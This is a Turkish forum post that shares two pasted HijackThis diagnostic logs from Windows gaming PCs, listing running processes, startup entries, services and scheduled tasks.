Rehber HijackThis Log Paylaşımı ve Çözümleri

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 02:18:54, on 17.02.2025
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.22621.3527)


Boot mode: Normal

Running processes:
C:\Program Files (x86)\ASUS\ArmouryDevice\dll\AcPowerNotification\AcPowerNotification.exe
C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe
C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe
C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe
C:\Program Files (x86)\ASUS\ArmouryDevice\dll\SwAgent\ArmourySwAgent.exe
C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe
C:\Program Files (x86)\Internet Download Manager\IDMan.exe
C:\Users\ahmet\OneDrive\Desktop\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=625119&clocalename=tr-TR
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = %11%\blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=
O1 - Hosts: ::1 localhost
O2 - BHO: IDM Helper - {0055C089-8582-441B-A0BF-17B458C2A3A8} - C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll
O2 - BHO: IEToEdge BHO - {1FD49718-1D00-4B19-AF5F-070AF6D5D54C} - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\BHO\ie_to_edge_bho.dll
O2 - BHO: Lync Click to Call BHO - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll
O2 - BHO: Bing Bar Helper - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files (x86)\Microsoft\BingBar\7.1.355.0\BingExt.dll
O3 - Toolbar: Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - "C:\Program Files (x86)\Microsoft\BingBar\7.1.355.0\BingExt.dll" (file missing)
O3 - Toolbar: (no name) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - (no file)
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [RazerCortex] "C:\Program Files (x86)\Razer\Razer Cortex\RazerCortex.exe" -autorun
O4 - HKLM\..\Run: [EpicPen] "C:\Program Files (x86)\Epic Pen\EpicPen.exe" -startup
O4 - HKCU\..\Run: [OneDrive] "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [Opera GX Stable] C:\Users\ahmet\AppData\Local\Programs\Opera GX\opera.exe
O4 - HKCU\..\Run: [RiotClient] C:\Riot Games\Riot Client\RiotClientServices.exe --launch-background-mode
O4 - HKCU\..\Run: [IDMan] C:\Program Files (x86)\Internet Download Manager\IDMan.exe /onboot
O4 - HKCU\..\Run: [Steam] "C:\Program Files (x86)\Steam\steam.exe" -silent
O4 - HKCU\..\Run: [EpicGamesLauncher] "C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe" -silent -launchcontext=boot
O4 - HKCU\..\Run: [Opera GX Browser Assistant] C:\Users\ahmet\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe
O4 - HKCU\..\Run: [MicrosoftEdgeAutoLaunch_734FEFB1E41B958571F346D2AA30EFBA] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
O4 - HKCU\..\Run: [com.blitz.app] "C:\Users\ahmet\AppData\Local\Programs\Blitz\Blitz.exe" --autostart
O4 - HKCU\..\Run: [Discord] "C:\Users\ahmet\AppData\Local\Discord\Update.exe" --processStart Discord.exe
O4 - HKCU\..\Run: [EADM] "C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALauncher.exe" -silent
O4 - HKCU\..\Run: [Spotify] C:\Users\ahmet\AppData\Roaming\Spotify\Spotify.exe --autostart --minimized
O4 - HKCU\..\Run: [Proton Drive] "C:\Users\ahmet\AppData\Local\Programs\Proton\Drive\ProtonDrive.exe" -quiet
O4 - HKCU\..\Run: [Synapse3] C:\Program Files (x86)\Razer\Synapse3\WPFUI\Framework\Razer Synapse 3 Host\Razer Synapse 3.exe /StartMinimized
O4 - HKCU\..\Run: [LGHUB] "C:\Program Files\LGHUB\system_tray\lghub_system_tray.exe" --minimized
O4 - HKUS\S-1-5-19\..\Run: [OneDriveSetup] C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Local Service')
O4 - HKUS\S-1-5-20\..\Run: [OneDriveSetup] C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [Norton Download ManagerFORCE_UPGRADE_22_22_9] C:\PROGRA~3\Norton\{0C55C~1\NORTON~1.EXE /m /noui /instversion "22.22.9" (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Norton Download ManagerFORCE_UPGRADE_22_22_9] C:\PROGRA~3\Norton\{0C55C~1\NORTON~1.EXE /m /noui /instversion "22.22.9" (User 'Default user')
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE/3000
O8 - Extra context menu item: IDM ile indir - C:\Program Files (x86)\Internet Download Manager\IEExt.htm
O9 - Extra button: Lync Click to Call - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll
O9 - Extra 'Tools' menuitem: Lync Click to Call - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\nlansp_c.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O17 - HKLM\System\CCS\Services\Tcpip\..\{7c0cd90e-7128-46ae-a69d-b86111e86750}: NameServer = 1.1.1.1,1.0.0.1
O18 - Protocol: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL
O18 - Protocol: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL
O18 - Protocol: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL
O18 - Protocol: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL
O18 - Protocol: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Filter hijack: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLMF.DLL
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: ARMOURY CRATE Service (ArmouryCrateService) - ASUSTeK COMPUTER INC. - C:\Program Files\ASUS\ARMOURY CRATE Lite Service\ArmouryCrate.Service.exe
O23 - Service: ASUS Com Service (asComSvc) - ASUSTeK Computer Inc. - C:\Program Files (x86)\ASUS\AXSP\4.02.23\atkexComSvc.exe
O23 - Service: ASUS G ncelleme Hizmeti (asus) (asus) - ASUSTeK Computer Inc. - C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe
O23 - Service: AsusCertService - ASUSTek COMPUTER INC. - C:\Program Files (x86)\ASUS\AsusCertService\AsusCertService.exe
O23 - Service: AsusFanControlService - ASUSTeK Computer Inc. - C:\Program Files (x86)\ASUS\AsusFanControlService\2.03.20\AsusFanControlService.exe
O23 - Service: ASUS G ncelleme Hizmeti (asusm) (asusm) - ASUSTeK Computer Inc. - C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe
O23 - Service: AsusUpdateCheck - Unknown owner - C:\Windows\System32\AsusUpdateCheck.exe (file missing)
O23 - Service: BattlEye Service (BEService) - Unknown owner - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: CortexLauncherService - Razer Inc. - C:\Program Files (x86)\Razer\Razer Cortex\CortexLauncherService.exe
O23 - Service: @%SystemRoot%\system32\CredentialEnrollmentManager.exe,-100 (CredentialEnrollmentManagerUserSvc) - Unknown owner - C:\Windows\system32\CredentialEnrollmentManager.exe (file missing)
O23 - Service: CredentialEnrollmentManagerUserSvc_452ae - Unknown owner - C:\Windows\system32\CredentialEnrollmentManager.exe (file missing)
O23 - Service: @%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000 (diagnosticshub.standardcollector.service) - Unknown owner - C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe (file missing)
O23 - Service: EAAntiCheatService - Electronic Arts - C:\Program Files\EA\AC\eaanticheat.gameservice.exe
O23 - Service: EABackgroundService - Electronic Arts - C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe
O23 - Service: Easy Anti-Cheat (Epic Online Services) (EasyAntiCheat_EOS) - Epic Games, Inc. - C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: Epic Online Services (EpicOnlineServices) - Epic Games, Inc. - C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe
O23 - Service: NVIDIA FrameView SDK service (FvSvc) - NVIDIA - C:\Program Files\NVIDIA Corporation\FrameViewSDK\nvfvsdksvc_x64.exe
O23 - Service: @%systemroot%\system32\GameInputSvc.exe,-101 (GameInputSvc) - Unknown owner - C:\Windows\System32\GameInputSvc.exe (file missing)
O23 - Service: HP Print Scan Doctor Service (HPPrintScanDoctorService) - HP Inc. - C:\Program Files\HPPrintScanDoctor\HPPrintScanDoctorService.exe
O23 - Service: @oem55.inf,%PlatformLicenseManagerServiceName%;Intel(R) Platform License Manager Service (Intel(R) Platform License Manager Service) - Intel(R) Corporation - C:\Windows\System32\DriverStore\FileRepository\iclsclient.inf_amd64_fc84dfa25a6a7727\lib\PlatformLicenseManagerService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_af50fdb80983f7bc\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: LGHUB Updater Service (LGHUBUpdaterService) - Logitech, Inc. - C:\Program Files\LGHUB\lghub_updater.exe
O23 - Service: @oem7.inf,%logi_lamparray_service.SvcName%;Logitech LampArray Service (logi_lamparray_service) - Logitech, Inc. - C:\Windows\System32\DriverStore\FileRepository\logi_lamparray_usb.inf_amd64_3786a31d1dad269d\logi_lamparray_service.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: NVIDIA LocalSystem Container (NvContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA Display Container LS (NVDisplay.ContainerLocalSystem) - NVIDIA Corporation - C:\Windows\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_0afec3f2050014a0\Display.NvContainer\NVDisplay.Container.exe
O23 - Service: @%systemroot%\system32\PerceptionSimulation\PerceptionSimulationService.exe,-101 (perceptionsimulation) - Unknown owner - C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe (file missing)
O23 - Service: ProtonVPN Service - Unknown owner - C:\Program Files\Proton\VPN\v3.2.11\ProtonVPNService.exe (file missing)
O23 - Service: Razer Game Manager (Razer Game Manager Service) - Razer Inc - C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe
O23 - Service: Razer Game Manager Service 3 - Razer Inc - C:\Program Files (x86)\Razer\Razer Services\GMS3\GameManagerService3.exe
O23 - Service: Razer Synapse Service - Unknown owner - C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.exe (file missing)
O23 - Service: Razer Update Service - Razer - C:\Program Files (x86)\Razer\RzUpdateEngineService\RzUpdateEngineService.exe
O23 - Service: Rockstar Game Library Service (Rockstar Service) - Rockstar Games - C:\Program Files\Rockstar Games\Launcher\RockstarService.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: Razer Central Service (RzActionSvc) - Razer Inc. - C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\SecurityHealthAgent.dll,-1002 (SecurityHealthService) - Unknown owner - C:\Windows\system32\SecurityHealthService.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe,-1001 (Sense) - Unknown owner - C:\Program Files (x86)\Windows Defender Advanced Threat Protection\MsSense.exe (file missing)
O23 - Service: @%SystemRoot%\system32\SensorDataService.exe,-101 (SensorDataService) - Unknown owner - C:\Windows\System32\SensorDataService.exe (file missing)
O23 - Service: @firewallapi.dll,-50323 (SNMPTrap) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spectrum.exe,-101 (spectrum) - Unknown owner - C:\Windows\system32\spectrum.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\steamservice.exe
O23 - Service: @%SystemRoot%\system32\TieringEngineService.exe,-702 (TieringEngineService) - Unknown owner - C:\Windows\system32\TieringEngineService.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: vgc - Riot Games, Inc. - C:\Program Files\Riot Vanguard\vgc.exe
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: Intel(R) Management Engine WMI Provider Registration (WMIRegistrationService) - Intel Corporation - C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_d51901c26227fb29\WMIRegistrationService.exe
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
O23 - Service: Zakynthos Service (zksvc) - KRAFTON, Inc - C:\Program Files\Common Files\PUBG\zksvc.exe

--
End of file - 16099 bytes

O2 - BHO: Bing Bar Helper - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files (x86)\Microsoft\BingBar\7.1.355.0\BingExt.dll
O3 - Toolbar: Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - "C:\Program Files (x86)\Microsoft\BingBar\7.1.355.0\BingExt.dll" (file missing)
O3 - Toolbar: (no name) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - (no file)
O4 - HKUS\S-1-5-18\..\Run: [Norton Download ManagerFORCE_UPGRADE_22_22_9] C:\PROGRA~3\Norton\{0C55C~1\NORTON~1.EXE /m /noui /instversion "22.22.9" (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Norton Download ManagerFORCE_UPGRADE_22_22_9] C:\PROGRA~3\Norton\{0C55C~1\NORTON~1.EXE /m /noui /instversion "22.22.9" (User 'Default user')

Logfile of HiJackThis+ build 2025-01-16 Beta v.3.4.0.17

Platform:  x64 Windows 11 (Home), 10.0.26100.3194 (ReleaseId: 2009, 24H2), Service Pack: 0
Time:      19.02.2025 - 03:31 (UTC+03:00)
Language:  OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Memory:    27,63 GiB Free / 32. Loading RAM (13 %), CPU (2 %)
Disk C:    820,13 GiB Free / 953 (SSD, GPT)
Elevated:  Yes
Ran by:    Cihan    (group: Administrators; type: Microsoft) on CANAVAR, FirstRun: yes

Chrome:  132.0.6834.197
Internet Explorer: 11.0.26100.1882
Default: "C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument %1 (Google Chrome)

Boot mode: Normal (Secure Boot: On) (Code Integrity: On)

Running processes:
Number | Path
   1  C:\Program Files (x86)\Feature Manager\Feature Manager Service.exe
   1  C:\Program Files (x86)\Feature Manager\Feature_Manager.exe
   1  C:\Program Files (x86)\Feature Manager\MSIAPService.exe
   1  C:\Program Files (x86)\Feature Manager\OmApSvcBroker.exe
   1  C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
   1  C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2506.4.0_x64__cv1g1gvanyjgm\WhatsApp.exe
   1  C:\Program Files\WindowsApps\AppUp.IntelGraphicsExperience_1.100.5688.0_x64__8j3eq9eme6ctt\IGCC.exe
   1  C:\Program Files\WindowsApps\Microsoft.YourPhone_1.25011.56.0_x64__8wekyb3d8bbwe\PhoneExperienceHost.exe
   1  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpDefenderCoreService.exe
   1  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MsMpEng.exe
   1  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\NisSrv.exe
   1  C:\Users\Cihan\Desktop\HiJackThis\HiJackThis.exe
   1  C:\Windows\explorer.exe
   1  C:\Windows\System32\AggregatorHost.exe
   1  C:\Windows\System32\audiodg.exe
   2  C:\Windows\System32\csrss.exe
   1  C:\Windows\System32\ctfmon.exe
   1  C:\Windows\System32\dasHost.exe
   2  C:\Windows\System32\dllhost.exe
   1  C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_2c7653f29a37d3f4\OneApp.IGCC.WinService.exe
   1  C:\Windows\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_b25cc008923a9297\ipf_helper.exe
   1  C:\Windows\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_b25cc008923a9297\ipf_uf.exe
   1  C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_d51901c26227fb29\WMIRegistrationService.exe
   2  C:\Windows\System32\DriverStore\FileRepository\nvmii.inf_amd64_085de2d4b49d7707\Display.NvContainer\NVDisplay.Container.exe
   1  C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_a9e9122da4b4db5b\RtkAudUService64.exe
   1  C:\Windows\System32\dwm.exe
   2  C:\Windows\System32\fontdrvhost.exe
   1  C:\Windows\System32\LsaIso.exe
   1  C:\Windows\System32\lsass.exe
   1  C:\Windows\System32\NgcIso.exe
   5  C:\Windows\System32\RuntimeBroker.exe
   1  C:\Windows\System32\SearchIndexer.exe
   1  C:\Windows\System32\SearchProtocolHost.exe
   1  C:\Windows\System32\services.exe
   1  C:\Windows\System32\ShellHost.exe
   1  C:\Windows\System32\sihost.exe
   1  C:\Windows\System32\smartscreen.exe
   1  C:\Windows\System32\smss.exe
   1  C:\Windows\System32\spoolsv.exe
  77  C:\Windows\System32\svchost.exe
   2  C:\Windows\System32\taskhostw.exe
   1  C:\Windows\System32\wbem\WMIADAP.exe
   1  C:\Windows\System32\wbem\WmiPrvSE.exe
   1  C:\Windows\System32\wininit.exe
   1  C:\Windows\System32\winlogon.exe
   1  C:\Windows\System32\wlanext.exe
   3  C:\Windows\System32\WUDFHost.exe
   1  C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
   1  C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\CHXSmartScreen.exe
   1  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
   1  C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
   1  C:\Windows\SysWOW64\MSIService.exe

O4 - ActiveSetup: HKLM\..\{8A69D345-D564-463c-AFF1-A69D9E530F96}: [StubPath] = C:\Program Files\Google\Chrome\Application\132.0.6834.197\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level --channel=stable (sign: 'Google LLC')
O4 - HKCU\..\StartupApproved\Run: [MicrosoftEdgeAutoLaunch_2290CA5D22A0CF51FC792BE002BC6E36] = C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --win-session-start (2024/11/28) (sign: 'Microsoft')
O4 - HKCU\..\StartupApproved\Run: [Steam] = C:\Program Files (x86)\Steam\steam.exe -silent (2024/11/28) (sign: 'Valve Corp.')
O4 - HKCU\..\StartupApproved\StartupFolder: C:\Users\Cihan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote'a Gönder.lnk    ->    C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (file missing) /tsr (2025/02/04)
O4 - HKLM\..\StartupApproved\Run: [RtkAudUService] = C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_a9e9122da4b4db5b\RtkAudUService64.exe -background (2024/12/08) (sign: 'Realtek Semiconductor Corp.')
O4 - HKLM\..\StartupApproved\Run: [SecurityHealth] = C:\WINDOWS\system32\SecurityHealthSystray.exe (2024/12/08) (sign: 'Microsoft')
O4 - HKLM\..\StartupApproved\Run32: [Keyboard Lighting Manager] = C:\Program Files (x86)\Keyboard Lighting Manager\Keyboard Lighting Manager.exe -systemstartup (2024/11/28) (sign: 'Micro-Star International CO., LTD.')
O4 - HKU\S-1-5-19\..\Run: [OneDriveSetup] = C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Local service') (sign: 'Microsoft')
O4 - HKU\S-1-5-20\..\Run: [OneDriveSetup] = C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Network service') (sign: 'Microsoft')
O7 - KnownFolder: C:\Users\Cihan\Desktop\Downloads (folder missing)
O7 - KnownFolder: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, {374DE290-123F-4565-9164-39C4925E467B} = C:\Users\Cihan\Desktop\Downloads
O7 - KnownFolder: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, {374DE290-123F-4565-9164-39C4925E467B} = %USERPROFILE%\Desktop\Downloads
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Se&nd to OneNote: (default) = C:\Program Files\Microsoft Office\root\Office16\ONBttnIE.dll (file missing)
O17 - DHCP DNS 1: 178.233.140.147
O17 - DHCP DNS 2: 46.196.235.228
O17 - DHCP DNS 3: 46.196.235.35
O22 - Tasks: (disabled) \Microsoft\Office\Office Apps Prewarm - C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe /prewarm (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Office\Office Apps Prewarm Recurring - C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe /prewarm (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical - {613FBA38-A3DF-4AB8-9674-5604984A299A},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical - {DE434264-8FE9-4C0B-A83B-89EBEEBFF78E},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Flighting\FeatureConfig\BootstrapUsageDataReporting - {D759C938-B375-41CB-A2A2-E6D866A767F4} - C:\Windows\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Autopilot\DetectHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},DetectHardwareChange - C:\Windows\System32\Autopilot.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Autopilot\RemediateHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},RemediateHardwareChange - C:\Windows\System32\Autopilot.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\MdmDiagnosticsCleanup - C:\WINDOWS\system32\MdmDiagnosticsTool.exe /clean (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Servicing\OOBEFodSetup - C:\WINDOWS\system32\OOBEFodSetup.exe (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\SharedPC\Account Cleanup - {7750564D-D61C-4557-8A9D-7DF56BDCFF96} - C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Shell\ThemeAssetTask_SyncFODState - {3BC5DD7D-EA3B-428C-B9B6-0723DB6A1057} - C:\Windows\System32\Windows.UI.Immersive.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Office\Office Performance Monitor - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\operfmon.exe (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW invsvc (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aemarebackup.dll -f:BackupMareData (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser - C:\WINDOWS\system32\sc.exe start InventorySvc (sign: '')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser Exp - C:\WINDOWS\system32\compattelrunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun express (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (sign: 'Microsoft')
